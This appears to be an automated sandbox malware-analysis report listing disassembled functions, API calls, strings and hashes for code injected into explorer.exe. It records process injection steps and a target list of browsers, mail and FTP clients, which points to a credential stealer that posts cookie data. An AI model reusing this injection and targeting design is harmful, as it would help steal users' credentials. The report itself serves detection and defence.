wsprintfW.USER32 ref: 030419F2
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03041AD0

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 03041A34
Accept: */*Referer: %S, xrefs: 030419E8
POST, xrefs: 030419A0

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 5cd8e3a0923a565d83820a71e8e598d9e9791961e6e2c54e205a4f7a5f49c0ed
Instruction ID: 3219c97bb49e3c2ec032dd9d2dd5eae36cd7d30ed8e6d6d1c1eeb755b1b991d4
Opcode Fuzzy Hash: 5cd8e3a0923a565d83820a71e8e598d9e9791961e6e2c54e205a4f7a5f49c0ed
Instruction Fuzzy Hash: 238198B920A340AFD314EF6AD884A6BBBE9EFC8344F04092DF545C7250EB75DA44CB52

Function 030423E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0304104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03042A16,?,00000001), ref: 03041056

lstrcat.KERNEL32(?,00000000), ref: 030425BB
lstrcat.KERNEL32(?,030442A8), ref: 030425C7
lstrcat.KERNEL32(?,?), ref: 030425D6
lstrcat.KERNEL32(?,030442AC), ref: 030425E5

Strings

dyn_header, xrefs: 030424C8
?, xrefs: 03042463
:authority, xrefs: 0304243A

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: lstrcat$AllocVirtual
String ID: :authority$?$dyn_header
API String ID: 3028025275-1785586894
Opcode ID: 10441f34e1fec8c2598e02ac18b509dab16aaae822d7d201d9e68f1e39586b02
Instruction ID: 78711eadf5da1d3e3e7736861b497dcb08ed17c989463ea2a60dc3105a3e6d0e
Opcode Fuzzy Hash: 10441f34e1fec8c2598e02ac18b509dab16aaae822d7d201d9e68f1e39586b02
Instruction Fuzzy Hash: C261C4F570A3128BC710EE25D1907AEB7EEABD4251F440D7DF8815B282DB749B0D8B62

Function 030428AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155

RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0304291B
lstrcat.KERNEL32(?,030442BC), ref: 0304292A
lstrlen.KERNEL32(?,74DE8A60,00000001,?,?,00000000,?,?,03042B26,?,?,?,?,00000001), ref: 0304295C

Strings

cookie , xrefs: 030428D4, 0304293C

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: lstrlen$MemoryMovelstrcat
String ID: cookie
API String ID: 2957667536-1295510418
Opcode ID: a5d921f3dba4f55192ddebafd06c47e1ab69360797956cf95f54693f967620fb
Instruction ID: 87aef6b85ebd4d4b206401b087bf8061cbe2f99f4b2f7c1361cb554c0278f9d8
Opcode Fuzzy Hash: a5d921f3dba4f55192ddebafd06c47e1ab69360797956cf95f54693f967620fb
Instruction Fuzzy Hash: C211DFB23063065BC711EE98DC85BABB7EDDF80700F18093DF9019A241EBB1EA4A4390

Function 03041E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 03041E83
LoadLibraryA.KERNEL32(?,03046058,00000000,00000000,74DF2EE0,00000000,030420DC,?), ref: 03041EAB
GetProcAddress.KERNEL32(00000000,-00000002), ref: 03041ED8
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03041F29

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 7272143b47f68b96d980a7ef01985f98dfb2708de35509eaddfde581879468bd
Instruction ID: 7f02c476de4b27a36a91da0602c44102f3b2fc68f8a33da4a76facdbed89e9f3
Opcode Fuzzy Hash: 7272143b47f68b96d980a7ef01985f98dfb2708de35509eaddfde581879468bd
Instruction Fuzzy Hash: 6331B6B6702212ABCB58CF2ACD84B66B7D8FF15354B08457CE845C7201D735E996C7A0

Function 030412AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000), ref: 030412BC
IsWow64Process.KERNEL32(000000FF,?), ref: 030412CE
IsWow64Process.KERNEL32(00000000,?), ref: 030412E1
CloseHandle.KERNEL32(00000000), ref: 030412F7

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 966b3c3b8c4309d418a2a4ce33b56a87dc706b61e5edd32f4c4fceda4f7e4c28
Instruction ID: 0daf0749a47f47fbfa5977df1ebd4e0f1966b5d5800197678a0c28c6c9544d06
Opcode Fuzzy Hash: 966b3c3b8c4309d418a2a4ce33b56a87dc706b61e5edd32f4c4fceda4f7e4c28
Instruction Fuzzy Hash: 90F090F5807218FF9B14DFE1AA449EEB7BCEA05251F14426AE801D2140D7344F52A6A1

Function 030432F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03046038), ref: 03043332
RtlLeaveCriticalSection.NTDLL(03046038), ref: 03043358

Strings

POST, xrefs: 03043338

Memory Dump Source

Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3041000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: POST
API String ID: 3168844106-1814004025
Opcode ID: 79ccae71b52dd2e4c381b4e7c5cacbbd553f4f2deaa2ff71f1536c7faabcf0b3
Instruction ID: 3bbfbcb5aa3b72b790456cccb5484ba15265c3caec697c228f53afab2fadd6ba
Opcode Fuzzy Hash: 79ccae71b52dd2e4c381b4e7c5cacbbd553f4f2deaa2ff71f1536c7faabcf0b3
Instruction Fuzzy Hash: A701D6B9103208FBCB31AF11E94889F7BADEF8276271C0470F90996115EF36DB60D6A4

Analysis Process: explorer.exePID: 3484, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	42.9%
Signature Coverage:	0%
Total number of Nodes:	49
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00711DB0 Relevance: 4.6, APIs: 3, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00711E03
FindNextFileW.KERNELBASE ref: 00711E7B
FindClose.KERNELBASE ref: 00711E88

Part of subcall function 00711EB4: FindFirstFileW.KERNELBASE ref: 00711F05
Part of subcall function 00711EB4: FindNextFileW.KERNELBASE ref: 00711F7C
Part of subcall function 00711EB4: FindClose.KERNELBASE ref: 00711F89

Memory Dump Source

Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_711000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction ID: 0fe722373229c343645c118eb87a4dd3e038b1b10fbeb3309985f01644da6978
Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction Fuzzy Hash: A821953031CE088BDB58FB2CA8992A937D1EB98351F40465DE94EC72D6DE38D94587C5

Function 00711EB4 Relevance: 4.6, APIs: 3, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00711DB0: FindFirstFileW.KERNELBASE ref: 00711E03
Part of subcall function 00711DB0: FindNextFileW.KERNELBASE ref: 00711E7B
Part of subcall function 00711DB0: FindClose.KERNELBASE ref: 00711E88

FindFirstFileW.KERNELBASE ref: 00711F05
FindNextFileW.KERNELBASE ref: 00711F7C
FindClose.KERNELBASE ref: 00711F89

Memory Dump Source

Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_711000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction ID: 53b92593e879031f4efdc25e9580f8fc44845d91f7107a333a99670577cf396a
Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction Fuzzy Hash: D121657021CA488FDF44FF2CA4993A977E1FBA8304F40066DA65AC71D2DF38D9858785

Function 00715300 Relevance: 1.6, APIs: 1, Instructions: 71
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00715378

Memory Dump Source

Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_711000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction ID: 7d19ab47d7c2b78b1829469406c8aa583c388f4ac67b7e08db6133f13bfcd164
Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction Fuzzy Hash: 9B110620611D098FEB5DFBBC949D2B93395EB54311F54403AE425C72E1DA2DCAC08300

Function 00711D08 Relevance: 6.0, APIs: 4, Instructions: 47
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00711D1D
Process32First.KERNEL32 ref: 00711D3C
Process32Next.KERNEL32 ref: 00711D67
CloseHandle.KERNELBASE ref: 00711D74

Memory Dump Source

Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_711000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction ID: e668fd4112737807ac814d8b35e78b198d926bd1e6f49d0f44fddda0645c2b34
Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction Fuzzy Hash: E7014430208A088FD755EF2CE8487AE76E2FBD8315F40462DA19AC6194DB38D9858745

Function 0071D748 Relevance: 4.7, APIs: 3, Instructions: 246
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 0071D847
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0071D8E5
VirtualProtect.KERNELBASE ref: 0071D903

Memory Dump Source

Source File: 00000015.00000002.2660315579.000000000071C000.00000040.80000000.00040000.00000000.sdmp, Offset: 0071C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_71c000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction ID: a4f7ae1c4dd50f0f3c81d0d6b8db00b9de81a6eb4a88a0b6876b73ae2841159e
Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction Fuzzy Hash: 6051673225891D4BCB38AA7C9CC43F5B7D1F759325B58063AC49AC32C5EA5CDCC68B81

Function 00711B74 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00711B8B
MapViewOfFile.KERNELBASE ref: 00711BAA

Memory Dump Source

Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_711000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction ID: 2a6d8ced01ba2495985756f805e5f728776ac28c279e2e90ebc11292fb769307
Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction Fuzzy Hash: A3F08C34318F094FAB44EF7C9C8C136B7E0EBA8202B048A7EA94AC7164EF34C8808701

Function 00714914 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00711D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00711D1D
Part of subcall function 00711D08: Process32First.KERNEL32 ref: 00711D3C
Part of subcall function 00711D08: CloseHandle.KERNELBASE ref: 00711D74

Part of subcall function 00711D08: Process32Next.KERNEL32 ref: 00711D67

SleepEx.KERNELBASE ref: 00714952

Part of subcall function 00711EB4: FindFirstFileW.KERNELBASE ref: 00711F05
Part of subcall function 00711EB4: FindNextFileW.KERNELBASE ref: 00711F7C
Part of subcall function 00711EB4: FindClose.KERNELBASE ref: 00711F89

Memory Dump Source

Source File: 00000015.00000002.2660315579.0000000000711000.00000040.80000000.00040000.00000000.sdmp, Offset: 00711000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_711000_explorer.jbxd

Similarity

API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
String ID:
API String ID: 1868932505-0
Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction ID: 9c010cd851773848674af447d8280533063dfc5e50189052265980d99954992e
Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction Fuzzy Hash: 7A31A931618A088FDB59FF6CE8995EA73E2FB98301B50472ED54BC71A1DE38D94587C0

Analysis Process: explorer.exePID: 692, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	0%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00321016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00322608: VirtualQuery.KERNEL32(00324434,?,0000001C), ref: 00322615

Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00321038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0032106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00321074
GetCurrentProcessId.KERNEL32(?,00321010), ref: 0032107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003210DF
Process32First.KERNEL32(00000000,?), ref: 003210FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0032111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0032112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00321142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00321156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00321166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0032117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0032118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 003211A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 003211B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 003211CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 003211DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 003211F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00321206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00321216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00321226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00321236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00321246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00321256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00321266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00321276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 003212B4
Process32Next.KERNEL32(00000000,00000128), ref: 0032130B
CloseHandle.KERNELBASE(00000000), ref: 0032131C
Sleep.KERNELBASE(000003E8), ref: 00321327

Strings

thebat64.exe, xrefs: 003211AC
mailchat.exe, xrefs: 0032126C
foxmail.exe, xrefs: 0032124C
outlook.exe, xrefs: 00321170
mailmaster.exe, xrefs: 0032122C
microsoftedgecp.exe, xrefs: 003210D2, 00321160, 003212AE
iexplore.exe, xrefs: 00321124
chrome.exe, xrefs: 00321138
smartftp.exe, xrefs: 003211E8
alimail.exe, xrefs: 0032125C
thunderbird.exe, xrefs: 003211C0
filezilla.exe, xrefs: 003211D4
thebat.exe, xrefs: 00321184
263em.exe, xrefs: 0032123C
cuteftppro.exe, xrefs: 0032121C
flashfxp.exe, xrefs: 0032120C
opera.exe, xrefs: 0032114C
thebat32.exe, xrefs: 00321198
winscp.exe, xrefs: 003211FC
firefox.exe, xrefs: 00321114

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-1680033604
Opcode ID: 6aa480c76c3f41e044277e7d2f2a67305dddff8fec7de464401e1f7e5f80d295
Instruction ID: f8b2825b9e4d9079284aaa9e9dc33e45913f86b7aebc9501016c09d57b0fa8e2
Opcode Fuzzy Hash: 6aa480c76c3f41e044277e7d2f2a67305dddff8fec7de464401e1f7e5f80d295
Instruction Fuzzy Hash: 1671A531604325EBCB13EBB1BD45E6B7BACAF55780F05092DFA41C3090EB74EA068A75

Function 003210A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003210DF
Process32First.KERNEL32(00000000,?), ref: 003210FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0032111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0032112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00321142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00321156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00321166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0032117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0032118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 003211A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 003211B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 003211CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 003211DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 003211F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00321206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00321216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00321226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00321236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00321246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00321256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00321266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00321276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 003212B4
Process32Next.KERNEL32(00000000,00000128), ref: 0032130B
CloseHandle.KERNELBASE(00000000), ref: 0032131C
Sleep.KERNELBASE(000003E8), ref: 00321327

Strings

thebat64.exe, xrefs: 003211AC
mailchat.exe, xrefs: 0032126C
foxmail.exe, xrefs: 0032124C
outlook.exe, xrefs: 00321170
mailmaster.exe, xrefs: 0032122C
microsoftedgecp.exe, xrefs: 003210D2, 00321160, 003212AE
iexplore.exe, xrefs: 00321124
chrome.exe, xrefs: 00321138
smartftp.exe, xrefs: 003211E8
alimail.exe, xrefs: 0032125C
thunderbird.exe, xrefs: 003211C0
filezilla.exe, xrefs: 003211D4
thebat.exe, xrefs: 00321184
263em.exe, xrefs: 0032123C
cuteftppro.exe, xrefs: 0032121C
flashfxp.exe, xrefs: 0032120C
opera.exe, xrefs: 0032114C
thebat32.exe, xrefs: 00321198
winscp.exe, xrefs: 003211FC
firefox.exe, xrefs: 00321114

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: b5fb97f3e4c0381476b9fc39090eb8f832ac8996f8ccc0d99b13ba6267ee4013
Instruction ID: 72192e5513cb6d4561290a556a3e6aa0539b2a83583c55911d13ee827e0ecebc
Opcode Fuzzy Hash: b5fb97f3e4c0381476b9fc39090eb8f832ac8996f8ccc0d99b13ba6267ee4013
Instruction Fuzzy Hash: 9351A731604329E6CB12DBB1BD45E6F7BEC6F55780F45092DFA80C3080EB78EA058A75

Function 00327728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000326000.00000040.80000000.00040000.00000000.sdmp, Offset: 00326000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_326000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e819ac051166f20f8297e5d30c42042f53986116ff2d4cf99ffa3f3050bfa1
Instruction ID: 0a522b1def0c57fb02e39e0dd1859aabcba9e42350ac6018a4f2e0e2e1bdf9e2
Opcode Fuzzy Hash: 95e819ac051166f20f8297e5d30c42042f53986116ff2d4cf99ffa3f3050bfa1
Instruction Fuzzy Hash: 6351187195C3B24FD7238A78EC846B17BA4FB52320B2A0679C5E5CB3C6E7945C06C7A1

Function 00322861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
RtlAllocateHeap.NTDLL(00000000), ref: 0032286B

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 37a4742909cae72459a859f27ae54f4d0bd2922c8d1160e97c6e96d4c25ff159
Instruction ID: 215fb98f33d9ba994f2bfa4771c378c40047539e3e4650aa93db947d3a92d673
Opcode Fuzzy Hash: 37a4742909cae72459a859f27ae54f4d0bd2922c8d1160e97c6e96d4c25ff159
Instruction Fuzzy Hash: 80A002715501407FDD5657A4AD0DF553A1DA745705F008548724BC50609978554D8775

Non-executed Functions

Function 00321819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00322608: VirtualQuery.KERNEL32(00324434,?,0000001C), ref: 00322615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0032184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00321889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00321919
RtlMoveMemory.NTDLL(00000000,00323428,00000016), ref: 00321940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00321968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00321978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00321992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0032199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 003219A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 003219AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003219C5
GetProcAddress.KERNEL32(00000000), ref: 003219CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003219E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00321A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00321A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00321A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00321A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00321A74

Strings

opera_shared_counter, xrefs: 0032198B
ntdll, xrefs: 003219C0
microsoftedgecp.exe, xrefs: 0032181D
atan, xrefs: 003219BB

Memory Dump Source

Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_321000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-4141090125
Opcode ID: 1cae8a815ff229c0a92f7b65d34545911217e790a62a22962ca112030f46eae8
